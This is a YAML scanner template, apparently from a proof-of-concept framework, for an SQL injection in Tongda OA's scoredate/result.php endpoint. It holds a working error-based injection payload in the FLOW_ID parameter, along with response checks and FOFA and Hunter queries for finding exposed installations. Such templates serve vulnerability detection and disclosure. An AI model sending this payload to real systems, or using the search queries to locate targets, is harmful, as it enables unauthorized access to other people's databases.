product: 通达OA
vName: 通达OA scoredate-result.php接口存在SQL注入
type: SQL注入
vID: [ ]
level: 3
vDesc: 通达OA存在未授权访问漏洞，该漏洞源于系统对用户传入的数据过滤不严。攻击者可借助特制的HTTP请求利用该漏洞操作数据库。
version: ''
note: ''
search:
  FOFA: app="TDXK-通达OA"
  Hunter: app.name="通达 OA"
protocol: http
link: https://cn-sec.com/archives/2334357.html
fix:
  - 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.tongda2000.com/
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /general/score/flow/scoredate/result.php?FLOW_ID=1%df' and extractvalue(1,concat(0x5c,MD5(123456)))-- -
    verify:
      path: ''
      logic: and
      check:
        - body:
            value:
              - XPATH syntax error
              - e10adc3949ba59abbe56e057f20f883e
            logic: and